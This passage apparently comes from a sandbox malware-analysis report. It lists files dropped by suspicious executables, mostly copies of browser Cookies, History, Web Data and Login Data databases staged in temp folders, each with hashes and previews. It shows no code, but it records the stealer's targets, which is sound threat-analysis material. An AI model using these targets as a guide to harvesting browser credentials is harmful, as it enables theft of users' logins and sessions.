                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\bXltIHp07DyFCookies

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\vCvMjkd9JmEgHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\vbKGdxzUo0NnHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\veUXa65l0ZGYWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\DpoKb1TgzuWIWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\ErhB6uKxZtCKHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\F7uygTvkxlIzCookies

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\Qm1AceSVKIlSWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\QoVyn3aTUlnbLogin Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\R3aXl4Dcy7YjWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\Rr5KBnMjw6zGWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\ViF2XXfrZuiTHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\W2o9V4GQRDVyWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\WQN4l6QIKakALogin Data For Account

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\cFIp2Q1xHQk9Cookies

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
